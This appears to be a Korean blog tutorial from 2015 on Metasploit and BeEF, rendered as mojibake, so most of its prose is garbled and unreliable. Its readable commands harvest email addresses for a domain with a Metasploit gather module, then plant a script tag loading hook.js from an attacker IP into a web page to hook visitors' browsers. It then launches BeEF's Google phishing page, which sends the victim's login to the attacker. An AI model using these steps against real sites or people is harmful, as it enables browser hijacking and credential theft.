msfconsole ์ ์ด์ฉํ์ฌ ๋ง์ ์ ๋ณด๋ฅผ ์ฐพ์ ์ ์๋ค.
์์์ ๋ณด์ฌ์ค ์ ๋ณด๋ค ๋ฟ์๋๋ผ ์ด๋ฉ์ผ ์ฃผ์๊น์ง ์์๋ผ์ ์๋ค.
ํ์ง๋ง msf ์์ฒด๋ ๋ฏธ๊ตญ์ ์ค์ ์ด ๋์ด ํ๊ตญ ์ ๋ณด๋ ๋ง์ด ์๋ค๋ ์ ์ด๋ค...
(์ ์์ ์ธ ํ์์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.)
1. use auxiliary/gather/search_email_collector
2. set domain [๋๋ฉ์ธ]
3. run
BeEF
BeEF๋ Browser Exploit Framework ๋ก์จ ์ฌ์ฉ์ PC์ ์ ๋ณด ์์ง๋ถํฐ ๊ณต๊ฒฉ๊น์ง ๊ฐ๋ฅํ ๋๊ตฌ์ด๋ค.
์ฃผ๋ก xss(ํฌ๋ก์ค ์ฌ์ดํธ์คํฌ๋ฆฝํธ)๊ณต๊ฒฉ ์ทจ์ฝ์ ์ ์ฐพ๊ธฐ ์ํด ์ฌ์ฉ์ด๋๋ค.
๊ทธ๋ผ xss๋ ๋ฌด์์ผ๊น?
์ด๋ ์น์์ ์ฌ์ฉํ๋ ํด๋ผ์ด์ธํธ ์คํฌ๋ฆฝํธ๋ฅผ ํตํด ํน์ ํ ํ๋์ ์ผ์ผํค๋ ์ทจ์ฝ์ ์ ๋งํ๋ค.
beEF ์ค์น!!
apt-get install beef-xss
๋จผ์ BeEF๋ฅผ ์คํ์ํค๊ธฐ ์ ์ apache2๋ฅผ ์คํ์ํค์
1. service apache2 start
์ ์ด๋ฏธ ์คํ ๋๊ณ ์๋ค๊ณ ๋จ๋ค์!!
๋ค์์ BeEF-xss๋ฅผ ์คํ์์ผ๋ณด์!!
2. beef-xss
์ ๋ ฅํ๊ณ ๋ช์ด ๊ธฐ๋ค๋ฆฌ๋ฉด
์ด๋ฌํ ์ฐฝ์ด ๋ฌ๋ค. (ID: beef // PW: beef)
์ด๋ฌํ ์ฐฝ์ด ๋จ๋๋ฐ ์ ๊ฐ์ ๊ฒฝ์ฐ์๋ ์ ์ ๋ญํ๋ค๊ณ ์ฌ์ฉํํ์ ์ด ์๋ค์. ์ผ์ชฝ์ ๋ณด๋ฉด IP๋ค์ด ๋ฑ๋ก๋์ด ์์ต๋๋ค.
์ด์ ํ๊ฐ์ง ํ์ ์ผํ ๊ฒ์ด์์ต๋๋ค.!!!
3. cd /var/www <=์ด๋ํ index.html ๋ด์ฉ์
4. vi index.html
<script src="http://๊ณต๊ฒฉ์ IP :3000/hook.js"></script>
์ ๋ ฅ์ ํด์ฃผ์๊ณ esc : wq ์ฐจ๋ก๋ก ๋๋ฌ์ฃผ์๋ฉด์ ๋์ต๋๋ค.
๊ทธ ํ ํผํด์ ์ปดํจํฐ์์ ๊ณต๊ฒฉ์ ์์ดํผ๋ก์ ์ํ์๋ฉด
์ผ์ชฝ์ ์ด๋ฌํ๊ฒ ํ์๋ฉ๋๋ค.
21 : Attacker IP
41 : Victim IP
์ด์ 41๋ฒ IP๋ฅผ ๋๋ฌ๋ณด๋ฉด
์ด๋ฌํ ์ฐฝ์ด ๋์ต๋๋ค.
์์ ๋ฉ๋ด๋ฐ ๊ฐ์ ๊ณณ์์ commands๋ผ๋ ๋ฒํผ์ด ์์ต๋๋ค.
์ฌ๊ธฐ์ ๋ช ๋ น์ ๋ด๋ฆด์ ์๋๋ฐ์?
๊ฐ์ข ๋ชจ๋์ด ์์ต๋๋ค. ์ฌ๊ธฐ์ ๊ณจ๋ผ ์ฌ์ฉํ์๋ฉด ๋ฉ๋๋ค.
๊ฐ๋จํ ๊ฒ์ ํ๋ ํด๋ณผ๊น์?
๊ตฌ๊ธ ํผ์ฑ์ฌ์ดํธ๋ฅผ ๋ง๋ค์ด ๋ณด๊ฒ ์ต๋๋ค.
social engineering์์ google phishing์ ๋๋ฅด์ ํ execute๋ฅผ ํด๋ฆญํ๋ฉด ์ ์ฉ์ด๋ฉ๋๋ค.
์ด๋ ๊ฒ ๋์ต๋๋ค. ์ ๋ ์ ์ ํ์ ์ด ๋ช๋ฒ ์์ด์ 8 ์ด๋ผ๊ณ ์ฐํ๋ค์.
ํผํด์ ์ปดํจํฐ์์ ๊ณต๊ฒฉ์ IP๋ฅผ ์ ๋ ฅํ๋ฉด ์ด๋ ๊ฒ ๊ตฌ๊ธ ๋ฉ์ผ์ฐฝ์ด๋น๋๋ค.!!!
๊ณผ์ฐ๋ก๊ทธ์ธ์ ํ๋ฉด?
์ด๋ ๊ฒ ๊ณต๊ฒฉ์์๊ฒ ๋ค๋์ด์จ๋ค๋ ์ฌ์ค!!!
๋ค์ํ๋ฒ ๋งํ์ง๋ง ๋ชจ๋ ์ฑ
์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.!!
๋ชจ๋์ metasploit๋ชจ๋์ด 0์ด๋ค. ์ด๋ฅผ ๊ฒ์ํด๋ณด๋
http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220000745475&redirect=Dlog&widgetTypeCall=true <= ๋ธ๋ก๊ทธ๊ฐ ๋์๋ค.! ํ๋ฒ์ฝ์ด๋ณด์ฅ!
'Metasploit' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
postgreSQL? (0) | 2015.12.14 |
---|---|
msfvenom (0) | 2015.12.06 |
Arp Spoofing & DNS Spoofing (0) | 2015.12.06 |
msf ์ด์ฉํ๊ธฐ2 (0) | 2015.12.02 |
msfconsole ์ด์ฉํ๊ธฐ (0) | 2015.12.01 |
๋๊ธ